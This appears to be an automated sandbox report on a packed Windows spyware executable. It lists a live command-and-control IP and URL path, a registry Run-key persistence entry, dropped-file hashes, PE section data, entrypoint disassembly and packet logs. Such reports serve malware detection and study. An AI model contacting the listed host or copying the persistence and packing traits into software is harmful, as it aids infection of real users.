https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434552345.0000000004359000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.425861993.0000000004177000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.487037473.0000000004148000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.472697671.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.392029102.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/homepage_tools.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://103.136.42.153/seemorebty/B	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.472522947.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.136.42.153	unknown	India	139884	AGPL-AS-APApeironGlobalPvtLtdIN	false
31.13.92.36	unknown	Ireland	32934	FACEBOOKUS	false
157.240.20.35	unknown	United States	32934	FACEBOOKUS	false
185.60.216.35	star-mini.c10r.facebook.com	Ireland	32934	FACEBOOKUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	718337
Start date and time:	2022-10-07 15:57:31 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	38b2c7a1af454d382927f81543d86055886bc02863457.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@3/6@10/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 56.2% (good quality ratio 45.1%) Quality average: 59.4% Quality standard deviation: 38.8%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:58:23	API Interceptor	27x Sleep call for process: 38b2c7a1af454d382927f81543d86055886bc02863457.exe modified
15:58:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyStart C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
15:58:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyStart C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.136.42.153	SecuriteInfo.com.Win32.Malware-gen.30674.exe	Get hash	malicious	Browse	103.136.42.153/seemorebty/il.php?e=SecuriteInfo.com.Win32.Malware-gen.30674
103.136.42.153	file.exe	Get hash	malicious	Browse	103.136.42.153/seemorebty/il.php?e=file

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AGPL-AS-APApeironGlobalPvtLtdIN	l39HA25qjw.exe	Get hash	malicious	Browse	103.136.42.153
	SecuriteInfo.com.Win32.Malware-gen.30674.exe	Get hash	malicious	Browse	103.136.42.153
	file.exe	Get hash	malicious	Browse	103.136.42.153
	qkOFMWXZmr	Get hash	malicious	Browse	103.136.41.100
	njE4JoXEp6	Get hash	malicious	Browse	103.136.41.110
	qICLEK5VRO	Get hash	malicious	Browse	103.136.41.110
	qaE0C9rclb	Get hash	malicious	Browse	103.136.41.110
	EG4I1Przgq	Get hash	malicious	Browse	103.136.40.176
	j0Ee2pkXcH	Get hash	malicious	Browse	103.136.40.176
	1Ggdi0m8hf	Get hash	malicious	Browse	103.136.40.176
	PpcvaRE8wF	Get hash	malicious	Browse	103.136.41.110
	aPll2HI0vq	Get hash	malicious	Browse	103.136.41.110
	QQ7EA6NtnR	Get hash	malicious	Browse	103.136.41.110
	Iitoq5GM0G.exe	Get hash	malicious	Browse	103.136.40.167
	GXUKKZ7Qnf	Get hash	malicious	Browse	103.136.41.110
	tJ9TlGLj1K	Get hash	malicious	Browse	103.136.41.110
	ixOTaOEDIW	Get hash	malicious	Browse	103.136.41.110
	OCrSf4L4AH	Get hash	malicious	Browse	103.136.41.110
	HvIio1rY75	Get hash	malicious	Browse	103.136.41.110
	nQ9DQ8dyp9	Get hash	malicious	Browse	103.136.41.110

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	xx.dll	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	79b2c383aa7f47ab2dc0e43f8a81cc0beb0587afa528c.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	xx.dll	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	CAN_A_#U007e1.JS	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	eHxpMIe4Qw.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	A6jZbLhwjR.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	f397ed34de579b8fe727507d13811cda060819c50f094.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	7e5006d509630d610db58ca5f415f07c68c947fc3a415.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	iD1sddR3nM.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36
	file.exe	Get hash	malicious	Browse	157.240.20.35 185.60.216.35 31.13.92.36

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe	l39HA25qjw.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\Desktop\d

Download File

Process:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x70a623c1, page size 8589967360, DirtyShutdown, Windows version 6.2
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.9422377500952945
Encrypted:	false
SSDEEP:	24576:UcLvIgxfFUFjB9SNzXkOuJAPmQGooOO3nX2BU:NUFnSNzkOuU
MD5:	992BDFFB055CB6BB82086A2F3CCF39D5
SHA1:	71DAD23C9A2E8F7CB0F307989E45EAFE12744DEF
SHA-256:	9AD1EDDB720983D29F4E29C35245F27ECED27432E06B7A1C726DAF43B57E3234
SHA-512:	DC1FF2BBB6D50612BA838BB7639F28D9C65005A2D16A85748062FD0E43EE18F744053B3FA8A182D5C54057FA8B9B9BEE06435BFE1E0E566C10AD239CBC320AC5
Malicious:	false
Reputation:	low
Preview:	p.#.... ........9........-.:;...zs............................."....z9......z......................................................................................................................................d............#......<...........:;...zs......................................................................................... ............................................................................................................................................................................................................................................................z....................d......z..........................d#..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\d.INTEG.RAW

Download File

Process:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	modified
Size (bytes):	64505
Entropy (8bit):	5.274930168438875
Encrypted:	false
SSDEEP:	384:oETBIpejruSQXjhgKqp6bLpR6LxNRF26V0fhADm5K92:oETBIpAQXjhgKjpR6LxBV0fhAP2
MD5:	70249F015C6EA92BF93447DB4E5DE4DF
SHA1:	9D51D2807BCFA69D9CAB8F1665EC30A11521FDF9
SHA-256:	9C687AFDAADB9BED3A06E752CF20FDF9A9D286CFD0434AAA01A8137B183B686F
SHA-512:	37B3F4662B098EE55A2E3465F31AA2FD043179C1F30097BDF838083A84A1297FEE7C9F6E38F4CE4E30738D402FB578D81D3FC67DEE4D48AB492984107044D6DB
Malicious:	false
Reputation:	low
Preview:	***** Repair of database 'd' started [ESENT version 06.02.9200.0000, (ESENT[6.2.9200.0] RETAIL RTM MBCS)]....search for 'ERROR:' to find errors..search for 'WARNING:' to find warnings..checking database header..ERROR: database was not shutdown cleanly (Dirty Shutdown)..database file "d" is 26738688 bytes..database file "d" is 26738688 bytes on disk...Creating 16 threads..checking SystemRoot..SystemRoot (OE)..ERROR: page 2: dbtime is larger than database dbtime (0x386c, 0x3791)..SystemRoot (AE)..ERROR: page 3: dbtime is larger than database dbtime (0x386e, 0x3791)..checking system tables..MSysObjects ..MSysObjectsShadow ..MSysObjects:.1092:.ERROR: page 13: dbtime is larger than database dbtime (0x3912, 0x3791)..MSysObjects:.1092:.ERROR: page 19: dbtime is larger than database dbtime (0x3857, 0x3791)..MSysObjects:.1092:.ERROR: page 20: dbtime is larger than database dbtime (0x38dc, 0x3791)..MSysObjects Name..MSysObjects RootObjects..MSysObjectsShadow:.1092:.ERROR: page 27: dbtime is larg

C:\Users\user\Desktop\d.jfm

Download File

Process:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.14778493435152118
Encrypted:	false
SSDEEP:	3:1W1iibdS34flvf//nAJxllF1ulQY5lHSlwKalv+/nvk+PllulhMck/V9WV/duk3G:1W1iX4tv3/qc5Vz+PGlhMc89IIkINU
MD5:	6FCB74A7D8D2C33DFFA00B589F0C0E45
SHA1:	7BC7C08DDBCB8B93818EE6FBB09D8521C429D947
SHA-256:	1585948A6CE06FACC2E0869A81FF901D1852058E79CF70B405EA8DD83C1D0D94
SHA-512:	0C7A0F040A34A5D523CF9AA686E6105B13790C105A84D0EF9CFF92BDC88B95C02005717C2197283D10C318EA77E31F0CB50F9146BB44BFFEA97837A831030009
Malicious:	false
Reputation:	low
Preview:	.........................................;...z.......z.......z...............z.......z...........z....................@......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\tmp.edb

Download File

Process:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xcf0f777a, page size 32768, JustCreated, Windows version 0.0
Category:	dropped
Size (bytes):	3375104
Entropy (8bit):	0.027413077595981113
Encrypted:	false
SSDEEP:	12:OZ0TYZ0TK1Axb0yg5p1OgtNT1X7Uf+1U70XXXX:v0yQQiwf
MD5:	D31A047260EB5671FB6784982F347C37
SHA1:	9D9178B6BAB793F2BEBE6F6391FF676728BD8996
SHA-256:	40593C713ECB8081E529062774755D1F1D8570B5A343E21AD13BD2261A425122
SHA-512:	AC84D4BA232DC1BD8CB6B775F649ED6D231FC23DD4454272FCD6AC342B7561146441BE5BE58A5EE8159F73B707062CB132E794778142922BD1D02F9D7310E22C
Malicious:	false
Reputation:	low
Preview:	..wz... .......@.........`......z.................................................................................................................................................................................................................................................................................................................. ...................................................................................................................................................................................................................................................PW.......z......................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Download File

Process:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1107968
Entropy (8bit):	7.998152820755428
Encrypted:	true
SSDEEP:	24576:zmWAbXH84DRnKCwyElWCAMmKix1x1IDStOX2cBZ8umx7QgbcxWsG2:zmXL8uokzK6DxcD8uqzbcxWX
MD5:	78C42D6817AF1AD96CABDF6FF2F7F3DA
SHA1:	ABEADCEE8D9F00C6CCDB0F9D33EDD1006A079384
SHA-256:	38B2C7A1AF454D382927F81543D86055886BC028634575050367D052EFD26434
SHA-512:	76A3B3E6AE0EA0F17661314FE391EC8B9B580A7ECFEE0EBE2D830DB3843D5D929D6BF3ADB8CB03F6B87212A607CE001700EA3DC305828C817FF017DD3B766811
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Joe Sandbox View:	Filename: l39HA25qjw.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-/..C\|..C\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|..B\|.C\|..\|..C\|..\|..C\|...\|..C\|..\|..C\|Rich..C\|................PE..L....o"c..............................)...........@...........................)...........@...................................)......P'.......................).........8............................................................................text...............................`....rdata... ..........................@....data....P....&..*..................@....rsrc........P'.....................@....reloc...P...`'.....................@....ask..... ....).....................`....adata........).....................@...................................................................................................................................................................................................................

C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.998152820755428
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	38b2c7a1af454d382927f81543d86055886bc02863457.exe
File size:	1107968
MD5:	78c42d6817af1ad96cabdf6ff2f7f3da
SHA1:	abeadcee8d9f00c6ccdb0f9d33edd1006a079384
SHA256:	38b2c7a1af454d382927f81543d86055886bc028634575050367d052efd26434
SHA512:	76a3b3e6ae0ea0f17661314fe391ec8b9b580a7ecfee0ebe2d830db3843d5d929d6bf3adb8cb03f6b87212a607ce001700ea3dc305828c817ff017dd3b766811
SSDEEP:	24576:zmWAbXH84DRnKCwyElWCAMmKix1x1IDStOX2cBZ8umx7QgbcxWsG2:zmXL8uokzK6DxcD8uqzbcxWX
TLSH:	9135336ED15C9CE0FA856E701B22ACF185AB8600C97F5E496D2108AC7F377573AC4ED8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-/..C\|..C\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|..B\|..C\|...\|..C\|...\|..C\|...\|..C\|...\|..C\|Rich..C\|.......

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x69b001
Entrypoint Section:	.ask
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63226FCF [Thu Sep 15 00:20:31 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	d3d598850ce2ae05173dfa57ec95fe27

Entrypoint Preview

Instruction
pushad
call 00007F077CB2BE88h
jmp 00007F07C20FC370h
push ebp
ret
call 00007F077CB2BE86h
jmp 00007F077CB2BEDFh
mov ebx, FFFFFFEDh
add ebx, ebp
sub ebx, 0029B000h
cmp dword ptr [ebp+00000488h], 00000000h
mov dword ptr [ebp+00000488h], ebx
jne 00007F077CB2C251h
lea eax, dword ptr [ebp+00000494h]
push eax
call dword ptr [ebp+00000FA9h]
mov dword ptr [ebp+0000048Ch], eax
mov esi, eax
lea edi, dword ptr [ebp+51h]
push edi
push esi
call dword ptr [ebp+00000FA5h]
stosd
mov al, 00h
scasb
jne 00007F077CB2BE7Fh
cmp byte ptr [edi], al
jne 00007F077CB2BE70h
lea eax, dword ptr [ebp+7Ah]
jmp eax
push esi
imul esi, dword ptr [edx+74h], 416C6175h
insb
insb
outsd
arpl word ptr [eax], ax
push esi
imul esi, dword ptr [edx+74h], 466C6175h
jc 00007F077CB2BEE7h
add byte ptr [esi+69h], dl
jc 00007F077CB2BEF6h
jne 00007F077CB2BEE3h
insb
push eax
jc 00007F077CB2BEF1h
je 00007F077CB2BEE7h
arpl word ptr [eax+eax+00h], si
mov ebx, dword ptr [ebp+00000595h]
or ebx, ebx
je 00007F077CB2BE8Ch
mov eax, dword ptr [ebx]
xchg dword ptr [ebp+00000599h], eax
mov dword ptr [ebx], eax
lea esi, dword ptr [ebp+000005C5h]
cmp dword ptr [esi], 00000000h
je 00007F077CB2BF90h
push 00000004h
push 00001000h
push 00001800h
push 00000000h
call dword ptr [ebp+51h]
mov dword ptr [ebp+00000148h], eax
mov eax, dword ptr [esi+00h]

Rich Headers

Programming Language:

[C++] VS2008 SP1 build 30729
[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2013 UPD2 build 30501
[C++] VS2013 UPD2 build 30501
[RES] VS2013 build 21005
[LNK] VS2013 UPD2 build 30501

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29c008	0x3d4	.ask
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x275000	0x2e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x29bfb0	0x8	.ask
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1eedc0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x100000

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1ed000	0xdc800	False	1.000167189271542	data	7.999735953883561	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x1ee000	0x72000	0x1f400	False	0.991296875	data	7.996543299720093	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x260000	0x15000	0x2a00	False	0.9757254464285714	data	7.925307536566968	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x275000	0x1000	0x200	False	0.138671875	data	0.6902015448489234	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x276000	0x25000	0xe400	False	0.9995031524122807	data	7.992249776166486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ask	0x29b000	0x2000	0x1800	False	0.5821940104166666	data	5.917624605155787	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.adata	0x29d000	0x1000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x29c3dc	0x280	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	GetProcAddress, GetModuleHandleA, LoadLibraryA
user32.dll	CopyRect
gdi32.dll	GetObjectType
advapi32.dll	RegDeleteKeyW
shell32.dll	SHBrowseForFolderW
ole32.dll	CoInitialize
msimg32.dll	TransparentBlt
shlwapi.dll	PathIsUNCW
uxtheme.dll	DrawThemeText
gdiplus.dll	GdipDrawImageRectI
ws2_32.dll	socket
iphlpapi.dll	GetAdaptersInfo
winhttp.dll	WinHttpCrackUrl
quartz.dll	AMGetErrorTextW
oleacc.dll	LresultFromObject
imm32.dll	ImmReleaseContext
winmm.dll	PlaySoundW
winspool.drv	OpenPrinterW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2022 15:58:23.472079992 CEST	49700	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:23.501863003 CEST	80	49700	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:23.502018929 CEST	49700	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:23.503640890 CEST	49700	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:23.533301115 CEST	80	49700	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:23.534363031 CEST	80	49700	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:23.586729050 CEST	49700	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:24.172147036 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.172238111 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.172327995 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.177196026 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.177238941 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.232177973 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.232285976 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.547590017 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.547665119 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.548070908 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.550981045 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.551038980 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.670402050 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.670461893 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.670497894 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.670535088 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.670572042 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.670574903 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.670605898 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.670627117 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.670655966 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.671922922 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.671998978 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.673594952 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.673665047 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.673666954 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.673693895 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.673775911 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.687361002 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.687407017 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.687443972 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.687486887 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.687581062 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.688055038 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.688148022 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.689428091 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.689481974 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.689500093 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.689532995 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.689687967 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.690721989 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.690785885 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.690809011 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.690831900 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.690900087 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.691873074 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.692039013 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.692786932 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.692854881 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.692878962 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.692902088 CEST	443	49701	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:24.692953110 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:24.693129063 CEST	49701	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.133167028 CEST	49702	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:40.163482904 CEST	80	49702	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:40.163583040 CEST	49702	80	192.168.2.5	103.136.42.153
